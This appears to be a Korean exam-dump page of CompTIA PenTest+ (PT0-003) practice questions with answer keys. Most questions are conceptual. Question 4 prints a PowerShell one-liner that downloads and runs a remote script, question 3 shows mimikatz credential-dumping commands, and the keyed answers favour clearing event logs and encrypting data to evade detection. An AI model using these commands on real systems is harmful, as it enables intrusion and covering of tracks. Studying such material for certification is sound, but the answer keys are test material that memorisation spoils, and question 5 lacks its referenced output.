최신 PT0-003 무료덤프 - CompTIA PenTest+

문제1

A penetration tester creates a list of target domains that require further enumeration. The tester writes the following script to perform vulnerability scanning across the domains:
line 1: #!/usr/bin/bash
line 2: DOMAINS_LIST = "/path/to/list.txt"
line 3: while read -r i; do
line 4: nikto -h $i -o scan-$i.txt &
line 5: done
The script does not work as intended. Which of the following should the tester do to fix the script?

A. Change line 3 to while true; read -r i; do.

B. Change line 2 to {"domain1", "domain2", "domain3", }.

C. Change line 4 to nikto $i | tee scan-$i.txt.

D. Change line 5 to done < "$DOMAINS_LIST".

정답: D

설명: (DumpTOP 회원만 볼 수 있음)

문제2

A penetration tester wants to use multiple TTPs to assess the reactions (alerted, blocked, and others) by the client's current security tools. The threat-modeling team indicates the TTPs in the list might affect their internal systems and servers. Which of the following actions would the tester most likely take?

A. Perform an internal vulnerability assessment with credentials to review the internal attack surface.

B. Use a BAS tool to test multiple TTPs based on the input from the threat-modeling team.

C. Perform a full internal penetration test to review all the possible exploits that could affect the systems.

D. Use a generic vulnerability scanner to test the TTPs and review the results with the threat-modeling team.

정답: B

설명: (DumpTOP 회원만 볼 수 있음)

문제3

During a penetration test, a tester compromises a Windows computer. The tester executes the following command and receives the following output:
mimikatz # privilege::debug
mimikatz # lsadump::cache
---Output---
lapsUser
27dh9128361tsg2€459210138754ij
---OutputEnd---
Which of the following best describes what the tester plans to do by executing the command?

A. The tester plans to use the hash collected to perform lateral movement to other computers using a local administrator hash.

B. The tester plans to collect the ticket information from the user to perform a Kerberoasting attack on the domain controller.

C. The tester plans to collect application passwords or hashes to compromise confidential information within the local computer.

D. The tester plans to perform the first step to execute a Golden Ticket attack to compromise the Active Directory domain.

정답: A

설명: (DumpTOP 회원만 볼 수 있음)

문제4

Given the following script:
$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1] If ($1 -eq "administrator") { echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1') | powershell -noprofile -} Which of the following is the penetration tester most likely trying to do?

A. Log the internet browsing history for a systems administrator.

B. Change the system's wallpaper based on the current user's preferences.

C. Conditionally stage and execute a remote script.

D. Capture the administrator's password and transmit it to a remote server.

정답: C

설명: (DumpTOP 회원만 볼 수 있음)

문제5

A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:

Which of the following targets should the tester select next?

A. financesite

B. hrdatabase

C. fileserver

D. legaldatabase

정답: C

설명: (DumpTOP 회원만 볼 수 있음)

문제6

Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?

A. Articulation of cause

B. Articulation of alignment

C. Articulation of escalation

D. Articulation of impact

정답: D

설명: (DumpTOP 회원만 볼 수 있음)

문제7

A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools. Which of the following should the consultant engage first?

A. OS fingerprinting

B. Host discovery

C. DNS enumeration

D. Service discovery

정답: B

설명: (DumpTOP 회원만 볼 수 있음)

문제8

A penetration tester discovers evidence of an advanced persistent threat on the network that is being tested.
Which of the following should the tester do next?

A. Remove the threat.

B. Document the finding and continue testing.

C. Report the finding.

D. Analyze the finding.

정답: C

설명: (DumpTOP 회원만 볼 수 있음)

문제9

During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?

A. Reduce the log retention settings.

B. Modify the system time.

C. Alter the log permissions.

D. Clear the Windows event logs.

정답: D

설명: (DumpTOP 회원만 볼 수 있음)

문제10

A penetration tester has adversely affected a critical system during an engagement, which could have a material impact on the organization. Which of the following should the penetration tester do to address this issue?

A. Perform a BIA.

B. Restore the configuration.

C. Follow the escalation process.

D. Select the target.

정답: C

설명: (DumpTOP 회원만 볼 수 있음)

문제11

A penetration tester needs to complete cleanup activities from the testing lead. Which of the following should the tester do to validate that reverse shell payloads are no longer running?

A. Spin down the C2 listeners.

B. Run scripts to terminate the implant on affected hosts.

C. Restore the firewall settings of the original affected hosts.

D. Exit from C2 listener active sessions.

정답: B

설명: (DumpTOP 회원만 볼 수 있음)

문제12

Which of the following techniques is the best way to avoid detection by Data Loss Prevention (DLP) tools?

A. Compression

B. Obfuscation

C. Encryption

D. Encoding

정답: C

설명: (DumpTOP 회원만 볼 수 있음)

문제13

A penetration testing team needs to determine whether it is possible to disrupt the wireless communications for PCs deployed in the client's offices. Which of the following techniques should the penetration tester leverage?

A. Sidecar scanning

B. Port mirroring

C. ARP poisoning

D. Channel scanning

정답: D

설명: (DumpTOP 회원만 볼 수 있음)

최신 PT0-003 무료덤프 - CompTIA PenTest+

우리와 연락하기

유용한 링크

최신 업데이트